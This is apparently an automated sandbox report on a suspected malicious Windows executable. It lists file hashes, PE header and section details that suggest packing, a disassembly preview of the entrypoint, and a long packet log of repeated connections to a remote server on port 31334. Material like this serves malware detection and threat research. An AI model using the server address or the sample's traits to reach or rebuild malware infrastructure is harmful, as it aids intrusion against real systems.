                                                                                                                                  SHA512:fd926bc25e61bfee4cb873b15f78556e4f23ddb853babbdd2985dd36386da9185433c4b6624b4dd444ae5121073c4d6861d4161ba9c460be62d2f49f2b999389
                                                                                                                                  SSDEEP:98304:4DIDD0PzdRnlgUpPGRShIyR5elYuHkpluPsLaDKUOVV:4De0PXnlbCyalu3uPsWDKUOVV
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................T.......7....................................

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:00828e8e8686b000

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x401000
                                                                                                                                  Entrypoint Section:
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                  Time Stamp:0x61E08BFA [Thu Jan 13 20:30:50 2022 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:6
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:6
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:6
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:c284fa365c4442728ac859c0f9ed4dc5

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  push 008F5001h
                                                                                                                                  call 00007F9C80C70E16h
                                                                                                                                  ret
                                                                                                                                  ret
                                                                                                                                  int3
                                                                                                                                  jnbe 00007F9C80C70DC7h
                                                                                                                                  inc edx
                                                                                                                                  and al, A4h
                                                                                                                                  pushfd
                                                                                                                                  jo 00007F9C80C70E67h
                                                                                                                                  leave
                                                                                                                                  hlt
                                                                                                                                  je 00007F9C80C70DF8h
                                                                                                                                  push es
                                                                                                                                  jmp 00007F9CBC84149Eh
                                                                                                                                  shl dword ptr [eax-7Ch], cl
                                                                                                                                  inc esi
                                                                                                                                  jnbe 00007F9C80C70DFBh
                                                                                                                                  out dx, al
                                                                                                                                  xor esp, dword ptr [edx-2497F614h]
                                                                                                                                  salc
                                                                                                                                  in al, dx
                                                                                                                                  push esp
                                                                                                                                  arpl word ptr [esi], ax
                                                                                                                                  pop ebp
                                                                                                                                  push ss
                                                                                                                                  xchg eax, ecx
                                                                                                                                  cmp al, byte ptr [esp]
                                                                                                                                  fisubr dword ptr [ebx-6276E776h]
                                                                                                                                  add al, byte ptr [edi-03h]
                                                                                                                                  pop edx
                                                                                                                                  jnc 00007F9C80C70E76h
                                                                                                                                  aad 80h
                                                                                                                                  call 00007F9C30D4F91Dh
                                                                                                                                  sbb eax, AAC528A4h
                                                                                                                                  push esp
                                                                                                                                  inc edi
                                                                                                                                  dec ecx
                                                                                                                                  push 6B96E3E9h
                                                                                                                                  test al, A0h
                                                                                                                                  mov al, byte ptr [A6A20888h]
                                                                                                                                  mov ebp, CA88F2F5h
                                                                                                                                  mov edi, 409E3134h
                                                                                                                                  jns 00007F9C80C70E1Fh
                                                                                                                                  mov eax, dword ptr [1760B368h]
                                                                                                                                  std
                                                                                                                                  sbb eax, 1B1FFC35h
                                                                                                                                  cmc
                                                                                                                                  xchg dword ptr [eax-4Fh], ebx
                                                                                                                                  dec ebx
                                                                                                                                  jmp far 0A33h : DC128E1Dh
                                                                                                                                  and dword ptr [ebx], edx
                                                                                                                                  push ebx
                                                                                                                                  xchg eax, esp
                                                                                                                                  jp 00007F9C80C70E5Bh
                                                                                                                                  rol byte ptr [ebx+1401D018h], 1
                                                                                                                                  mov esi, 06315812h
                                                                                                                                  movsd
                                                                                                                                  jecxz 00007F9C80C70DC1h
                                                                                                                                  cmp ah, byte ptr [esi-64h]
                                                                                                                                  jp 00007F9C80C70E76h
                                                                                                                                  adc ecx, dword ptr [edi+2D89AC22h]
                                                                                                                                  das
                                                                                                                                  ret
                                                                                                                                  jecxz 00007F9C80C70E84h
                                                                                                                                  scasb
                                                                                                                                  adc ebx, edi
                                                                                                                                  wait
                                                                                                                                  mov ebp, D4296BE2h
                                                                                                                                  adc ecx, dword ptr [F8540E75h]
                                                                                                                                  dec eax
                                                                                                                                  pop ecx
                                                                                                                                  mov al, 0Ah
                                                                                                                                  inc esp
                                                                                                                                  inc ebx
                                                                                                                                  retf
                                                                                                                                  leave
                                                                                                                                  int3
                                                                                                                                  push ss
                                                                                                                                  enter 29E8h, AAh

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x4f5c7c0x120.loHdXUK
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x4db0000x1961d.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x100000

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  0x10000x220000x11200False1.00044194799data7.99714150919IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  0x230000x10000x800False1.00537109375data7.89828462596IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  0x240000xf0000x7a00False1.00051229508data7.99330469272IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  0x330000x20000x400False1.0107421875data7.78378163159IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  0x350000x184b570x0False0empty0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  0x1ba0000x3210000x2f2e00unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rsrc0x4db0000x1a0000x19800False0.797200520833data7.22431447957IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  .loHdXUK0x4f50000x4b0000x4b000False0.987828776042data7.91937517669IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  .adata0x5400000x10000x0False0empty0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                  RT_RCDATA0x4db0a00x19400dataRussianRussia
                                                                                                                                  RT_MANIFEST0x4f44a00x17dXML 1.0 document textEnglishUnited States

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  kernel32.dllGetProcAddress, GetModuleHandleA, LoadLibraryA
                                                                                                                                  user32.dllSendNotifyMessageA
                                                                                                                                  user32.dllGetProcessWindowStation
                                                                                                                                  oleaut32.dllVariantChangeTypeEx
                                                                                                                                  kernel32.dllRaiseException

                                                                                                                                  Possible Origin

                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  RussianRussia
                                                                                                                                  EnglishUnited States

                                                                                                                                  Network Behavior

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Jan 14, 2022 14:10:23.709512949 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:23.796896935 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:23.797002077 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:24.136492968 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:24.224102020 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:24.264045954 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:25.159163952 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:25.247483015 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:25.295356035 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:32.091963053 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:32.186028957 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:32.186074972 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:32.186101913 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:32.186130047 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:32.233455896 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:35.538239956 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:35.641689062 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:35.654805899 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:35.745630026 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:35.764975071 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:35.842448950 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:35.890078068 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.255490065 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.343178988 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:36.390085936 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.397934914 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.482103109 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:36.483335018 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:36.494489908 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.577361107 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:36.624452114 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.687441111 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.771337986 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:36.771641970 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:36.812041044 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:37.849256039 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:37.941068888 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:37.984029055 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.003041029 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.098922968 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.100498915 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.195523977 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.213527918 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.310400963 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.314667940 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.412040949 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.417639017 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.506715059 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.508869886 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.588546991 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.640252113 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.685822010 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.763355970 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.812166929 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.769198895 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.848496914 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848567963 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848609924 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848651886 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.848706961 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.848743916 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848903894 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848989010 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.849109888 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.849236012 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.849315882 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.849493027 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.849663973 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.849746943 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.927041054 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927073002 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927088022 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927182913 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927268028 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.927330017 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.927339077 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927433968 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.927505016 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927697897 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927826881 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927833080 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.928020000 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928098917 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.928174973 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928427935 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928509951 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.928670883 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928754091 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928910017 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929117918 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929435015 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929454088 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929722071 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929796934 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.929867983 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.008032084 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.008120060 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.008166075 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.008246899 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.008256912 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.008265972 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.008304119 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.008487940 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.008563995 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.008595943 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.008966923 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.008981943 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.009048939 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.009130001 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.009351969 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.009730101 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.009754896 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.009886980 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.010050058 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.010277987 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.010410070 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.010607958 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.010770082 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.010960102 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.011161089 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.011320114 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.011476994 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.011679888 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.011838913 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.012042999 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.012202024 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.012208939 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.012341022 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.012403965 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.012608051 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.012768030 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.012998104 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.013158083 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.013314009 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.013479948 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.013674974 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.013884068 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.014045954 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.089538097 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.089590073 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.089636087 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.089828968 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.090027094 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.090279102 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.090454102 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.090728998 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.090749979 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.091495037 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.093558073 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.093647957 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.093880892 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.093990088 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.094044924 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.094106913 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.094240904 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.094502926 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.094527960 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.094818115 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.094916105 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.095159054 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.095283031 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.095431089 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.095603943 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.096007109 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.096164942 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.096364021 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.096566916 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.096728086 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.097043991 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.097117901 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.097284079 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.097455978 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.097683907 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.098076105 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.098170042 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.175338030 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.175386906 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.175416946 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.175574064 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.175673962 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.175729036 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.176001072 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.176131964 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.176431894 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.176459074 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.176718950 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.176877975 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.177058935 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.177263975 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.177421093 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.177568913 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.177788019 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.177943945 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.178423882 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.178489923 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.178612947 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.178837061 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.178992987 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.179199934 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.179356098 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.179598093 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.179790974 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.179934978 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.179941893 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.180037975 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.180120945 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.180241108 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.180479050 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.180650949 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.180867910 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.181040049 CET313344977595.143.179.185192.168.2.4
